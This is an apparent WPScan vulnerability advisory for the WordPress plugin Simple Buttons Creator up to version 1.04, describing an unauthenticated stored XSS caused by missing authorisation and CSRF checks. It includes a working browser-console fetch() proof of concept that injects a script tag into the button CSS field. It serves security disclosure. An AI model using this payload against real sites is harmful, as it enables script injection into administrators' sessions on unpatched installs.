WordPress Plugin Vulnerabilities
Simple Buttons Creator <= 1.04 - Unauthenticated Stored XSS
Description
The plugin does not have any authorisation as well as CSRF in its add button function, allowing unauthenticated users to call them either directly or via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins.
Proof of Concept
As a non-logged in visitor, run the following in the browser console (replace `<<ANY_ID>>` with any number):
```
fetch("/wp-content/plugins/simple-buttons-creator/bt-manage.php?page=sbc-new&method=post", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'button_id=<<ANY_ID>>&bt_name=CSRF909&bt_text=CSRF&bt_link=CSRF&bt_bg_color=CSRF&bt_txt_color=CSRF&bt_font_size=&bt_border_radius=&bt_css=</textarea><script>alert(2)</script>',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
As an admin, go to:
https://example.com/wp-admin/admin.php?page=simple-buttons&method=edit&id=<<ANY_ID>>
and see the XSS.
Affects Plugins
No known fix References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-03-25 (about 1 months ago)
Added
2024-03-25 (about 1 months ago)
Last Updated
2024-03-25 (about 1 months ago)
WPScan 